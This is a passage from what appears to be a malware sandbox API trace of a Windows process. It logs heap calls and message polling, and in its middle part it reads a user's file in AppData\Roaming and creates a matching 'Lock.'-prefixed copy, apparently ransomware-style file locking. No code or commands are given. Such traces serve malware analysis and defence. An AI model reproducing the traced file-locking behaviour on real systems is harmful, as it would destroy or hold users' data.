(HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0198.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0198.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0198.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0198.827] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0198.828] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.828] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.828] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0198.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0198.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0198.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0198.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0198.828] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/gFulebPw7UZ.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\gfulebpw7uz.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0198.828] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.828] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0198.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0198.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0198.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0198.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0198.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0198.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0198.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0198.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0198.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0198.829] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0198.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0198.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0198.829] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0198.829] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0198.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0198.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0198.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0198.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0198.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0198.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0198.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0198.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0198.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0198.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0198.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0198.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0198.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0198.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0198.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0198.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0198.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0198.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0198.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x24b30f8 [0198.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0198.830] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming")) returned 0x2010 [0198.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b30f8 | out: hHeap=0x25c0000) returned 1 [0198.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0198.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0198.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10000) returned 0x24c7a50 [0198.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0198.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0198.830] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/Lock.gFulebPw7UZ.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\lock.gfulebpw7uz.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x268 [0198.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0198.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0198.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0198.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0198.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0198.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0198.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0198.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0198.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0198.831] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0198.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0198.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0198.832] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0198.832] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0198.832] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0198.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0198.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0198.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0198.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0198.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0198.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0198.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0198.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0198.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0198.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0198.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0198.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0198.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0198.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0198.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0198.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0198.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0198.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0198.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0198.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0198.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0198.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0198.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0198.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0198.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0198.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0198.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0198.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0198.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0198.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0198.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x100000) returned 0x36b0020 [0198.834] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0198.834] ReadFile (in: hFile=0x294, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x10000, lpOverlapped=0x0) returned 1 [0198.836] ReadFile (in: hFile=0x294, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x26b3, lpOverlapped=0x0) returned 1 [0198.836] ReadFile (in: hFile=0x294, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0198.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0198.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0198.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0198.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0198.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x126b3) returned 0x24d7a58 [0198.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x36b0020 | out: hHeap=0x25c0000) returned 1 [0198.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0198.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0198.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0198.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0198.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0198.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0198.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0198.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0198.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x126b3) returned 0x34b2250 [0198.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24d7a58 | out: hHeap=0x25c0000) returned 1 [0198.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0198.840] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0198.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0198.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0198.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0198.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0198.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x126b3) returned 0x24d7a58 [0198.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0198.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24d7a58 | out: hHeap=0x25c0000) returned 1 [0198.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0198.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0198.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0198.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0198.841] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0198.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0198.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0198.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0198.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0198.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0198.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0198.841] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0198.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0198.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0198.841] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0198.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0198.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0198.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0198.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18c8 [0198.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0198.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0198.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0198.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0198.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x126b3) returned 0x24d7a58 [0198.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0198.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1888 [0198.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0198.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0198.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0198.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1788 [0198.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0198.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0198.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0198.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1368 [0198.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0198.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0198.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0198.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa140 [0198.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0198.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0198.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0198.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0198.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0198.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0198.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0198.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x126b3) returned 0x34c4910 [0198.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0198.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0198.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0198.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0198.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0198.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0198.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0198.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0198.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0198.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0198.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0198.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0198.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0198.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0198.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0198.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0198.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0198.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0198.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0198.844] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0198.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0198.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0198.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0198.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0198.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0198.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0198.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0198.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0198.845] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0198.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0198.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0198.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0198.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 